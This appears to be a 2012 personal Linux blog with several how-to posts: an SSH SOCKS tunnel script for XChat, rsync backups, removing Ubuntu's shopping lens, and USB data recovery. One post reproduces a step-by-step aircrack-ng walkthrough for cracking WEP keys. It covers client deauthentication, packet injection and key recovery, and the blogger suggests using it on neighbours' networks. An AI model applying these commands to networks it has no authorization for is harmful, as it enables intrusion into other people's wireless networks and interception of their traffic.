Connecting to an IRC server behind a firewall? I feel your pain!

September 29, 2012 Leave a comment

So I use Xchat daily and connect to a private IRC server to talk with my colleagues. I also have a BIP server in the office to record all of the IRC transcripts, this way I never miss any conversations regardless of the time of day. Because the BIP server is behind a firewall on the companies network I can’t access it from the outside.  For the past year I’ve been working around this by connecting to my companies firewall via ssh and creating a SOCKS tunnel then simply directing xchat to talk through my local SOCKS proxy.

To do this ,  open a terminal and issue:

ssh -CND <LOCAL_IP_ADDRESS>:<PORT> <USER>@<SSH HOST>

Ex: ssh -CND 192.168.1.44:9999 sfeole@companyfirewall.com

Starting ssh with -CND:

‘D’ Specifies a local “dynamic” application-level port forwarding. This works by allocating a socket to listen to port on the local side, optionally bound to the specified bind_address. It also adds compression to the datastream ‘C’ and the ‘N’ is a safeguard which protects the user from executing remote commands.

192.168.1.44 is my  IPv4 address

9999 is the local port i’m going to open and direct traffic through

After the SSH tunnel is open I now need to launch xchat, navigate to Settings -> Preferences -> Network Setup and configure xchat to use my local IP (192.168.1.44) and local port (9999) then press OK then Reconnect.

I should now be able to connect to the IRC server behind the firewall. Usually I run through this process a few times a day, so it becomes somewhat of a tedious annoyance after a while.

Recently I finished a cool python3 script that does all of this in quick command.

The following code will do the following:

1.) identify the ipv4 address of the interface device you specify

2.) configure xchat.conf to use the new ipv4 address and port specified by the user

3.) open the ssh tunnel using the SSH -CND command from above

4.) launch xchat and connect to your server (assuming you have it set to auto connect)

To use it simply run

$./xchat.py -i <interface> -p <port>

ex: $./xchat.py -i wlan0 -p 9999

the user can select wlan0 or eth0 and of course their desired port. When your done with the tunnel simply issue <Ctrl-C> to kill it and wala!

https://code.launchpad.net/~sfeole/+junk/xchat

#!/usr/bin/env python3
#Sean Feole 2012,
#
#xchat proxy wrapper, for those of you that are constantly on the go:
#   --------------  What does it do? ------------------
# Creates a SSH Tunnel to Proxy through and updates your xchat config
# so that the user does not need to muddle with program settings

import signal
import shutil
import sys
import subprocess
import argparse
import re
import time

proxyhost = "myhost.company.com"
proxyuser = "sfeole"
localusername = "sfeole"

def get_net_info(interface):
    """
    Obtains your IPv4 address
    """

    myaddress = subprocess.getoutput("/sbin/ifconfig %s" % interface)\
                .split("\n")[1].split()[1][5:]
    if myaddress == "CAST":
        print ("Please Confirm that your Network Device is Configured")
        sys.exit()
    else:
        return (myaddress)

def configure_xchat_config(Proxy_ipaddress, Proxy_port):
    """
    Reads your current xchat.conf and creates a new one in /tmp
    """

    in_file = open("/home/%s/.xchat2/xchat.conf" % localusername, "r")
    output_file = open("/tmp/xchat.conf", "w")
    for line in in_file.readlines():
        line = re.sub(r'net_proxy_host.+', 'net_proxy_host = %s'
                 % Proxy_ipaddress, line)
        line = re.sub(r'net_proxy_port.+', 'net_proxy_port = %s'
                 % Proxy_port, line)
        output_file.write(line)
    output_file.close()
    in_file.close()
    shutil.copy("/tmp/xchat.conf", "/home/%s/.xchat2/xchat.conf"
                 % localusername)

def ssh_proxy(ProxyAddress, ProxyPort, ProxyUser, ProxyHost):
    """
    Create SSH Tunnel and Launch Xchat
    """

    ssh_address = "%s:%i" % (ProxyAddress, ProxyPort)
    user_string = "%s@%s" % (ProxyUser, ProxyHost)
    ssh_open = subprocess.Popen(["/usr/bin/ssh", "-CND", ssh_address,
                 user_string], stdout=subprocess.PIPE, stdin=subprocess.PIPE)

    time.sleep(1)
    print ("")
    print ("Kill this tunnel with Ctrl-C")
    time.sleep(2)
    subprocess.call("xchat")
    stat = ssh_open.poll()
    while stat is None:
        stat = ssh_open.poll()

def main():
    """
    Core Code
    """

    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface',
                        help="Select the interface you wish to use",
                        choices=['eth0', 'wlan0'],
                        required=True)
    parser.add_argument('-p', '--port',
                        help="Select the internal port you wish to bind to",
                        required=True, type=int)
    args = parser.parse_args()

    proxyip = (get_net_info("%s" % args.interface))
    configure_xchat_config(proxyip, args.port)
    print (proxyip, args.port, proxyuser, proxyhost)

    ssh_proxy(proxyip, args.port, proxyuser, proxyhost)

if __name__ == "__main__":
    sys.exit(main())

Refer to the launchpad address above for more info.

Simple Python3 Code to parse your ipaddress

September 27, 2012 Leave a comment

I’ve been doing some side projects on my own requiring me to obtain my assigned IPv4 address.  In python3 you can do this by importing socket, which I believe is a better way than how I’m doing it below, however I found that using subprocess solved the issue!

I just put this together tonight and it does exactly what I wanted it to do. Feel free to copy and use it for your own little projects, you will need to add additional logic to the parser for additional network interfaces.

#!/usr/bin/env python3

import sys
import subprocess
import argparse

def get_net_info(interface):
    myaddress = subprocess.getoutput("/sbin/ifconfig %s" % interface)\
                .split("\n")[1].split()[1][5:]
    if myaddress == "CAST":
        print ("Please Confirm that your Network Device is Configured")
        sys.exit()
    else:
        return (myaddress)

def main():
#Parser Code
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface',
                        help="Select the interface you wish to use",
                        choices=['eth0', 'wlan0'],
                        required=True)
    args = parser.parse_args()

#    print ("%s" % args.interface)
    print (get_net_info("%s" % args.interface))

if __name__ == "__main__":
    sys.exit(main())

Heres the expected output below, in the event the device in question is NOT configured (unplugged/unplumbed), the following should output:

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i eth0
Please Confirm that your Network Device is Configured

And here is the expected output when the device is configured(plugged in and plumbed)

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i wlan0
192.168.1.44

And of course , invalid arguements…

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i www
usage: sean3.py [-h] -i {eth0,wlan0}
sean3.py: error: argument -i/–interface: invalid choice: ‘www’ (choose from ‘eth0’, ‘wlan0’)

Ubuntu 12.10 Amazon Search, HOW TO REMOVE

September 24, 2012 1 comment

So it’s been quite a long time since my last post. Frankly I’ve been busy with work/personal life, spending time with my little girl and catching up on random chores in and out of the house. Everyone can relate I’m sure.

Well , so new info!! Some of you know that Ubuntu 12.10 Quantal Quetzal release is right around the corner. I’ve been using it since Beta1 and I have to say it’s coming along nicely. A new feature that has some users in an uproar is the Amazon Search feature in Dash. Whenever searching for new items using the Search Lens the system will now poll results from Amazon.com.

Here’s an example:

I search for Music and note the results from Amazon which populate in as I wait…

To Remove this, Open a Terminal Window <Ctrl-Alt-T>

$sudo apt-get remove unity-lens-shopping

Logout and LogBack then search for MUSIC again

All Fixed.

Hope this helps!! and Enjoy the new 12.10 Features!<

How to backup all my Windows pics to the Linux box

March 25, 2012 Leave a comment

So if your like me, then you shoot RAW!  I use Adobe Photoshop CS5 and Adobe Lightroom 3.5 for most of my post imaging which means my photography is mostly saved on a windows box. So there’s really no “play nice” backup solution. Plus I have about 20 some odd GB of photos which makes FTP out of the question.  What would be ideal is if they made rsync for windows….  Wait, they do!  Check it out here using Cygwin.

So assuming your using a file server like Ubuntu I’ll jot down some instructions so you can do this at home as well!

I’m already guessing that you have rsync installed on your linux box, if not that can be easily fixed by:

#sudo apt-get install rsync

  1. Create a file named rsyncd.conf in /etc
    1. #sudo vi /etc/rsyncd.conf
    2. Add the following to rsyncd.conf, replacing all instances of usernamewith your Ubuntu username:
      [usernamebackup]
      
          path = /home/username/backup
          comment = Backup
          uid = username
          gid = username
          read only = false
          auth users = username
          secrets file = /etc/rsyncd.secrets
    3. #sudo chmod 644 /etc/rsyncd.conf
  2. Create a file named rsyncd.secrets in /etc
    1. #sudo vi /etc/rsyncd.secrets
    2. Add the following to rsyncd.secrets, replacing username with your username and passwordwith a password of your choosing:
      username:password
    3. #sudo chmod 600 /etc/rsyncd.secrets
  3. Open rsync port by editing /etc/default/rsync and setting
    RSYNC_ENABLE=true
  4. Restart rsync
    #sudo /etc/init.d/rsync restart

Set up rsync client on Windows

  1. Install Cygwin, making sure  Net > rsync (3.0.8) and Net > openssh are selected
  2. Add C:\cygwin\bin;to the Windows PATH statement
    1. Right-click on My Computer and select Properties
    2. Switch to the Advanced tab and click the Environment Variables button at the bottom
    3. Find the “Path” or “PATH” variable in the System variables list at the bottom and click Edit
    4. Add C:\cygwin\bin; to the beginning of the list
  3. Create secret file to store password in Cygwin
      1. Start Cygwin Bash Shell
      2. Create secret file in the filesystem root and enter only the password in rsyncd.secrets above, with no spaces or line breaks
    #vi /secret
    #chmod 600 /secret
  4. Create bat file to run rsync
    1. Open Notepad and enter the following command, replacing User Name with your Windows User Name directory, username with your Ubuntu username, and ipaddress with the IP address of your Ubuntu server (e.g. 192.168.1.35):
      C:\cygwin\bin\rsync.exe --chmod u+rwx -qrtzv --password-file=/secret --delete "/cygdrive/d/photos" username@ipaddress::usernamebackup

      This will copy "/cygdrive/d/photos"  to the path specified in the rsyncd.conf. .

    2. Save the file as C:\rsync.bat

Now to simply kick off a backup just copy the batch file to your desktop and kick that off every time you finish your edits. You could also create a schedule task to execute the batch script daily @ midnight, I prefer to just run it manually as I don’t keep my linux box up or windows system 24/7

Aircrack-NG, monitor wireless traffic on your network, heck… monitor your neighbors ;)

March 8, 2012 5 comments

So I wanted to show users how to sniff out their local wireless traffic , capture it and decrypt it.  However, before I made up a long winded post I decided to research it, see if someone else has done the work already. Sure enough someone has, so take a look at the following link. The article is geared for identifying wireless security holes and exploting them. But i’ll let you read the rest. It’s not advanced stuff, you can learn more about aircrack-ng in still interested.

I’ve copied the posters conents here, if you don’t want to deal with the link. If you want the screenshots, you’l have to sign into the forums.

GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:

1. Brute force attack
2. Dictionary attack
3. Statistical attack

By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:

1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)

I recommend “Linksys WUSB54G V4.0” as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.

PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. ’00:09:5B:D7:43:A8′ is the MAC address of my network, so you need to replace it with your own.
4. ’00:00:00:00:00:00′ is the MAC address of the target client, NOT that of your own wireless card.

COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.

  • 1. Enable monitoring with “airmon-ng” (screenshot #1):
  • Quote:
    sudo airmon-ng start <interface> <channel>
  • 2. Packet capturing with “airodump-ng” (screenshot #2):
    Quote:
    sudo airodump-ng –channel <channel> –write <file_name> <interface>

    Alternatively, try this (to collect data from target network only and hence increase performance):

    Quote:
    sudo airodump-ng –channel <channel> –bssid 00:09:5B:D7:43:A8 –write <file_name> <interface>

    NOTE:
    –channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
    –bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
    –write… Preferred file name; mandatory field (in our case).

  • 3.1. Now check if MAC filtering is enabled or turned off:
    Quote:
    sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    NOTE:
    -1… ‘0’ deauthenticates all clients.
    -e… ESSID of target access point.
    -a… MAC address of target access point.
    -h… MAC address of your choice.

  • 3.2. If the resulting output looks like this…
    Quote:
    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful 🙂

    …then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.

>> No MAC filtering <<

  • 4. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).

    Continue with #6.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… MAC address of your choice.

>> MAC filtering <<

  • 4. Deauthentication with “aireplay-ng” (screenshot #3):
    Quote:
    sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>

    NOTE:
    -0… Number of deauthentication attempts.
    -a… MAC address of target access point.
    -c… Client MAC address.

  • 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… Client MAC address.

  • 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):Aircrack-ng:
    Quote:
    sudo aircrack-ng <file_name>.cap

    Aircrack-PTW:

    Quote:
    ./aircrack-ptw <file_name>.cap

CAPTURING:
This is a summary based on information given here and there, respectively:

Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets

Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets

FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.

Categories: Linux Tags: , , , ,

ARM Hardfloat takes it up a notch in the performance category.

March 8, 2012 Leave a comment

http://www.phoronix.com/scan.php?page=article&item=ubuntu_1204_omap4460&num=1

Great article above, it’s looking good for armhf , I’m still waiting for the armhf TI patches for gstreamer/totem (Unless they have already been released)  I don’t see them here on

TI OMAP devel trunk PPA

, im pretty sure those are only available for Oneiric still. You can also get them integrated if you just build using linaro tools , assuming you have the correct hwpack and binary.

With the cpufreq support enabled, the dual-core Cortex-A9 can now run as low as 300MHz or ramp up to its highest 1.2GHz frequency stepping when needed. Without the cpufreq support, the SoC is just stuck running at around 1.0GHz. With this support finally enabled for Ubuntu Linux, there is some immediate performance boosts for the PandaBoard ES.

How to retrieve data after experiencing read errors on a USB stick

March 7, 2012 Leave a comment

So I figured I’d post this handy piece of info. Ever have to copy data from a USB stick and run into read errors.  I just did 😦

So aside from the fact I have some shitty USB keys, I really needed to save the data on this 4GB stick. I was able to retrieve the whole partition using gddrescue.  You can grab it from Ubuntu ppa..

sfeole@sfeolework:~$ apt-cache policy gddrescue
gddrescue:
Installed: 1.14-1
Candidate: 1.14-1
Version table:
*** 1.14-1 0
500 http://us.archive.ubuntu.com/ubuntu/ oneiric/universe amd64 Packages
100 /var/lib/dpkg/status

Read more about it here:

http://www.gnu.org/software/ddrescue/ddrescue.html

So by carrying out the following I was able to pull the partition off my USB stick, this copies the data block for block.

sfeole@sfeolework:~$ time sudo ddrescue -r3 -f /dev/sdb my4gusb.img
Press Ctrl-C to interrupt
rescued: 4012 MB, errsize: 0 B, current rate: 18481 kB/s
ipos: 4012 MB, errors: 0, average rate: 17958 kB/s
opos: 4012 MB, time from last successful read: 0 s
Finished

real 3m43.060s
user 0m0.308s
sys 0m13.773s

From here I was able to use a fresh new USB stick and DD my image back.

sfeole@sfeolework:~$dd if=my4gusb.img of=/dev/sdb